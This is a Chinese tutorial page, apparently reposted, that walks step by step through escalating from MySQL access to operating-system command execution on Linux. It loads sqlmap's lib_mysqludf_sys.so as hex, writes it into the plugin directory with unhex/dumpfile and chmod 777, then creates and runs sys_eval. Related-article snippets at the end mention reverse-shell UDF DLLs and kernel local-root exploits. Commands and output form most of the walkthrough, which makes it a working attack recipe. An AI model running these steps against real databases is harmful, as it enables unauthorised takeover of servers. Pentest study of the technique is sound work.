Linux利用UDF库实现Mysql提权_Mysql

环境:
os:linux(bt5)
 
database:mysql
 
简述:
通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。
 
要求:
 在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,UDF会被禁止;
 
过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文件加载函数并执行命令

1,得到插件库路径

mysql> show variables like "%plugin%";
+---------------+-----------------------+
| Variable_name | Value         |
+---------------+-----------------------+
| plugin_dir  | /usr/lib/mysql/plugin |
+---------------+-----------------------+
1 row in set (0.00 sec)

2,找对应操作系统的udf库文件
因为自己测试,看了下自己系统的版本,64位
 

root@bt:~# uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

 
对于udf文件,在sqlmap工具中自带就有,只要找对应操作系统的版本即可

root@bt:/pentest/database/sqlmap/udf/mysql# ls
linux windows
root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls
32 64
root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls
lib_mysqludf_sys.so

3,利用udf库文件加载函数并执行命令
首先要得到udf库文件的十六进制格式,可在本地通过
 

mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';
Query OK, 1 row affected (0.04 sec)

 
因为我测试时,使用自带账户,账户名mysql,并不是root,所以插件目录不可写,而实际中,一般udf提权都是用root权限启动的mysql程序,故,不存在目录权限不足,不能访问的情况。为了继续,修改目录权限
 
root@bt:~# chmod 777 /usr/lib/mysql/plugin
 
数据库中写入udf库到mysql库目录:
 

mysql> select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.04 sec)

 
查看下这个udf库所支持的函数

root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so
         w _Jv_RegisterClasses
0000000000201788 A __bss_start
         w __cxa_finalize
         w __gmon_start__
0000000000201788 A _edata
0000000000201798 A _end
0000000000001178 T _fini
0000000000000ba0 T _init
         U fgets
         U fork
         U free
         U getenv
000000000000101a T lib_mysqludf_sys_info
0000000000000da4 T lib_mysqludf_sys_info_deinit
0000000000001047 T lib_mysqludf_sys_info_init
         U malloc
         U mmap
         U pclose
         U popen
         U realloc
         U setenv
         U strcpy
         U strncpy
0000000000000dac T sys_bineval
0000000000000dab T sys_bineval_deinit
0000000000000da8 T sys_bineval_init
0000000000000e46 T sys_eval
0000000000000da7 T sys_eval_deinit
0000000000000f2e T sys_eval_init
0000000000001066 T sys_exec
0000000000000da6 T sys_exec_deinit
0000000000000f57 T sys_exec_init
00000000000010f7 T sys_get
0000000000000da5 T sys_get_deinit
0000000000000fea T sys_get_init
000000000000107a T sys_set
00000000000010e8 T sys_set_deinit
0000000000000f80 T sys_set_init
         U sysconf
         U system
         U waitpid

最后,加载函数并执行:

mysql> create function sys_eval returns string soname "mysqludf.so";
Query OK, 0 rows affected (0.14 sec)

mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql       |
+--------------------+
1 row in set (0.04 sec)

mysql> select * from mysql.func;
+----------+-----+-------------+----------+
| name   | ret | dl     | type   |
+----------+-----+-------------+----------+
| sys_eval |  0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set

以上是小编为您精心准备的的内容,在的博客、问答、公众号、人物、课程等栏目也有的相关内容,欢迎继续使用右上角搜索按钮进行搜索linux
mysql提权
mysql udf提权、linux mysql udf提权、mysql udf 提权工具、mysql 5.5 udf提权、mysql udf提权原理,以便于您获取更多的相关知识。

时间: 2024-10-23 19:38:10

Linux利用UDF库实现Mysql提权_Mysql的相关文章

mysql 提权问题做到这创建函数出现错误

问题描述 mysql 提权问题做到这创建函数出现错误 mysql版本5.0.22 按照网上的教程进行提权操作但做到 create function sys_eval returns string soname "lib_mysqludf_sys.so": 这一步的时候出现错误 create function sys_eval returns string soname "lib_mysqludf_sys.so"; ERROR 1126 (HY000): Can't

Linux下安装与使用MySQL详细介绍_Mysql

一.安装Mysql 1.下载MySQL的安装文件安装MySQL需要下面两个文件:MySQL-server-4.0.16-0.i386.rpm MySQL-client-4.0.16-0.i386.rpm下载地址为:http://dev.mysql.com/downloads/mysql-4.0.html,打开此网页,下拉网页找到"Linux x86 RPM downloads"项,找到"Server"和"Client programs"项,下载需

Mysql提权方法利用_安全教程

mysql是一个常用的数据库系统,应用极广泛,如果得到一个mysql的用户权限,如果提升呢,下面这个思路很先进! 但得有一定编程基础!   现在网上通过mysql获得系统权限大都通过MYSQL的用户函数接口UDF,比如Mix.dll和my_udf.dll.在Mix.dll中有一个MixConnect函数它会反弹shell,但是使用这个函数会造成MYSQL假死,前些天我就用这个函数反弹shell后由于网络原因不一会儿就断开了,造成了MYSQL当掉.my_udf.dll和Mix.dll相似,但它

Linux下启动多个mysql服务器例子_Mysql

1.  创建多个mysql database目录 复制代码 代码如下: Mysql_install_db  --datadir=/data/mysql_3307 2.  设置database目录权限 复制代码 代码如下: Chown –R mysql /data 3.  拷贝.设置my.cnf 复制代码 代码如下: cp  XXX/my.cnf /data/mysql_3307/my.cnf 添加my.cnf 复制代码 代码如下: log-error = /data/mysql_3307/loc

linux 2.6内核本地提权

It is possible to exploit this flaw to execute arbitrary code as root. Please note, this is a low impact vulnerability that is only of interest to security professionals and system administrators. End users do not need to be concerned. Exploitation w

Windows 提权实录技巧

这篇文章中我会讲Windows上一般提权的方法,并演示如何手动进行提权和其对应的Metasploit模块.当我们把权限从本地管理员提升到系统后更容易执行一些操作,而不适当的系统配置则可以使低权限的用户将自己的权限提升到高权限. Note:本文中我们主要关注于不依赖内核漏洞的提权,例如:KiTrap0d(Meterpreter getsystem提权的四种方法之一) Trusted Service Paths 这个漏洞存在于二进制服务文件路径中Windows错误解释空格.这些服务通常都是以系统权限

Android提权漏洞CVE-2014-7920&CVE-2014-7921分析

 Android提权漏洞CVE-2014-7920&CVE-2014-7921分析 没羽@阿里聚安全 这是Android mediaserver的提权漏洞,利用CVE-2014-7920和CVE-2014-7921实现提权,从0权限提到media权限,其中CVE-2014-7921影响Android 4.0.3及以后的版本,CVE-2014-7920影响Android 2.2及以后的版本.Google直到Android5.1才修复这2个漏洞.该漏洞[1]披露过程如下: 2016年1月24日漏洞作

Mysql数据库提权常用的安全问题介绍

一.UDF的安全问题利用 譬如, 执行一条sql语句查看/etc/passwd文件的内容:       这里主要是用到了load_file()函数,当然这个函数是可以被禁用的.以上可以轻松看到/etc/passwd文件的信息和ip地址,当然其他的文件内容都可以被看到. 由于load_file()函数只能实现类似系统命令cat的查看文件功能,但是想执行系统命令的功能,那么只能用UDF了,也就是User defined Function,用户定义函数. 查看mysql的plugin,plugin_d

linux入侵提权(服务器提权)方法

  利用mysql root提权方法 mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内. 一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如斯这般.今天我们换一种方式. 按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有